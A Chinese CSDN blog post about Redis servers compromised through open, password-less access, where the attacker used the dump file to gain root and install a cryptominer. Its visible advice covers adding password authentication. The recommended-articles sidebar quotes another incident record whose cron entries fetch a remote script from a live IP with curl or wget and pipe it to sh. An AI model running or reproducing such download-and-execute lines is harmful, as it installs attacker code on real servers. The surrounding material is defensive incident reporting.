Redis安全配置,以防数据库被入侵恶意清空,数据丢失,且dump.rdb文件无法恢复

最新推荐文章于 2024-01-22 17:22:49 发布
VIP文章 最新推荐文章于 2024-01-22 17:22:49 发布
阅读量5.1k 收藏 5
点赞数 2
分类专栏: redis 使用工具 文章标签: 数据库 redis 数据 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dreamgchuan/article/details/54347791
版权

最近比较衰,Redis数据库被好几次恶意攻击,导致里面的数据完全丢失。dump.rdb和appendonly.aof文件都不能恢复。一开始没有意识到数据库被攻击,后来几个数据库连续这样,才发现有问题。

被攻击后redis里面多了一个crackit表,打开一看发现对方通过入侵自己的redis数据库,然后利用dump文件获得服务器的root权限,企图使用自己的数据库挖矿(minerd,俗称挖比特币)。最近有大量的服务器被人入侵数据库,然后占用服务器的cpu挖比特币,所以对redis进行安全配置很有必要!很有必要!很有必要!千万不能疏忽!

大家一般使用Redis默认的.conf文件,默认端口是6379,没有认证密码,默认处理任何请求来源,这样会把自己的数据库完全暴露在外网环境中,十分危险。

Redis安全配置

对Redis进行安全配置主要从下面几个方面:

  • 为redis添加密码认证
添加密码认证有临时的和长久的两种方法

 1. 可以在redis运行时添加密码认证,在redis-cli连接redis后执行命令

    CONFIG SET requirepass "myPassWord"

    不过这种方式添加的密码认证只是临时的,在redis重启后密码就会失效
最低0.47元/天 解锁文章
EricGuo55
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
redis-6.2.5 配置文件redis.conf
09-20
redis官方docker镜像时没有redis.conf文件的,如果想设置redis以daemon方式启动,需要将这个配置文件挂载进容器中,以这个配置文件启动。
Redis配置文件redis.conf详细配置说明
01-21
redis.conf 配置项说明如下 redis配置文件详解 # vi redis.conf daemonize yes #是否以后台进程运行 pidfile /var/run/redis/redis-server.pid #pid文件位置 port 6379#监听端口 bind 127.0.0.1 #绑定地址,如外网需要连接,设置0.0.0.0 timeout 300 #连接超时时间,单位秒 loglevel notice #日志级别,分别有: # debug :适用于开发和测试 # verbose :更详细信息 # notice :适用于生产环境 # warning :只记录警告
Redis通过dump.rdb恢复数据
最新发布
p715306030的博客
01-22 569
dump.rdb恢复数据
rdbtools3:Python 3中实现的Redis dump.rdb解析器工具
05-05
Python 3中实现的Redis dump.rdb解析器工具 受到启发 文献资料 请参阅 用法示例 from rdbtools3 import parse_rdb_stream with open ( '/path/to/redis/dump.rdb' , 'rb' ) as f : for item in parse_rdb_stream ( f ): print ( item . key , item . value )
redis-rdb-tools, 解析 dump.rdb 文件,分析内存,并将数据导出到 JSON.zip
09-18
redis-rdb-tools, 解析 dump.rdb 文件,分析内存,并将数据导出到 JSON 解析Redis文件,分析内存,并将数据输出到 JSONRdbtools是一个用于 Redis dump.rdb 文件的解析器。 解析器生成类似于sax解析器的事件,并且是非常有效的内存逻辑。此外,rdbtools还提供了以下工具:在
redisdump.rdb 文件
12-11
dump.rdb---
Redis中使用RDB文件恢复数据无效或异常解决方案
qq_34585863的博客
10-05 3607
Redis中使用RDB文件恢复无效或异常解决方案 注意修改启动的配置文件redis6379.conf(我的是redis6379.conf,默认是redis.conf) ① appendonly no ② dbfilename dump6379.rdb ③ dir /roo/myredis/redis6379 2. 如何恢复数据 将备份文件dump6379.rdb)移动到redis安装目录并启动服务即可, 启动redis连接后 在redis中输入 CONFIG GET dir获取目录 我的是如下目
Redis 数据备份与恢复(亲测可用,其他博文有问题纠正)
d294083434的博客
01-17 835
redis使用技巧
Redis--rdb快照恢复
QQ331948781的专栏
09-06 2337
rdb的工作原理: 每隔N分钟或N次写操作后, 从内存dump数据形成rdb文件, 压缩 放在备份目录 注:红色部分可通过参数来配置 rdb参数设置(redis.conf文件) save 900 1    #刷新快照到硬盘中,必须满足两者要求才会触发,即900秒之后至少1个关键字发生变化。 save 300 10  #必须是300秒之后至少10个关键字发生变化。
redis RDB持久化不生效
stephen
10-12 2340
redis配置持久化: save 900 1 #在900秒(15分钟)之后,如果至少有1个key发生变化,则dump内存快照。 save 300 10 #在300秒(5分钟)之后,如果至少有10个key发生变化,则dump内存快照。 save 60 10000 #在60秒(1分钟)之后,如果至少有10000个key发生变化,则dump内存快照 但是重启了之后还是没有生效,是因为没有指定文件目录和文件名: dir ./ dbfilenam...
redis移动dump.rdb数据没有读取
LZX的博客
12-10 2288
在一个已有redis的环境下重新建库或者移动redis dump.rdb出现读取的还是之前存储的数据亦或没有读出数据的情况。 1.查看环境存在多少个dump.rdb find / -name dump.rdb 2.确定哪个dump.rdb是想要读取的,查看配置redis配置文件 redis.conf 185行左右 确定 dbfilename 名字 和 dir 位置 如果环境中存在多个du...
记一次内网靶机实战
千寻的博客
11-05 1824
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
redis数据备份与恢复
qq_33789859的博客
10-19 1345
redis数据备份与恢复
redis 误删dump.rdb 解决方案
weixin_30914981的博客
05-20 1439
进入到redis端口,info查看配置信息 进入redis端口 执行 config set dir /data/redis/ 执行 save 转载于:https://www.cnblogs.com/suppler/p/10892427.html
Redis 也能被攻击?一次Redis入侵的记录
探索云原生
12-05 5430
通过 RDB 方式入侵Redis 被攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
Redis未授权访问漏洞复现
yangbz123的博客
01-29 3596
Redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更新
redis数据备份恢复失效
qq_40310480的博客
01-17 596
1:利用JAVA方法写进去了100个键值对,在服务器上用redis-cli查看也是正常的 2:利用W3C官网的教程开始做数据备份和恢![在这里插入图片描述](https://img- https://www.w3cschool.cn/redis/redis-backup.html ...
Redis服务器被劫持风波
热门推荐
通往精英的成长之路
02-25 2万+
【前言】 俗话说全猛于虎,之前多多少少有所小体会;这次的上线Redis服务器被劫严重影响了开发测试和线上环境,在解决的过程也对安全方面了解了很多;总结了这次过程的排查流程以及采取的相应测试,在此与大家共享。 【被劫风波】 一、问题: 1、开发,生产,测试服务器(shiro :246;开发:251; 测试:204;生产:164,165)每台机器的Redis...
安全redis设置,问题居然这么严重!(服务器挖矿病毒的解决方案)
coderxz的博客
06-29 3676
记录一次解决挖矿病毒的过程(进程:susupdate,networkservice) 昨天晚上突然收到阿里云的警报提醒,服务器又被攻击,开始还没当回事,晚上测试的时候发现服务器变的异常卡顿。然后进入后台查看,发现CPU直接飙升到100%… 文章目录1.找出病毒进程2.根据进程号找到运行文件的位置3.删除病毒进程4.删除病毒文件4.1 文件无法正常删除如何解决?5.删除定时任务(重要!!)6.修改/root/.ssh/authorized_keys文件7.修复SElinux和wget、curl指令8.被.
redisdump.rdb可以删除吗
09-06
不可以直接删除redisdump.rdb文件Redis在启动时会检查是否存在dump.rdb文件,如果存在则会将其加载到内存中。如果删除了dump.rdb文件,下次启动时将无法加载之前保存的数据。 但是,可以通过修改redis.conf文件中的配置来禁用redis的持久化功能,即将"save"参数设置为一个空数组。这样redis就不会自动将数据保存到dump.rdb文件中。 另外,可以使用命令`BGSAVE`来手动触发redis进行持久化操作,将数据保存到dump.rdb文件中。这个命令不会删除已存在的dump.rdb文件,而是在新的持久化操作中生成一个新的dump.rdb文件。 总之,虽然无法直接删除redisdump.rdb文件,但可以通过修改配置禁用持久化功能或手动触发持久化操作来控制dump.rdb文件的生成。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值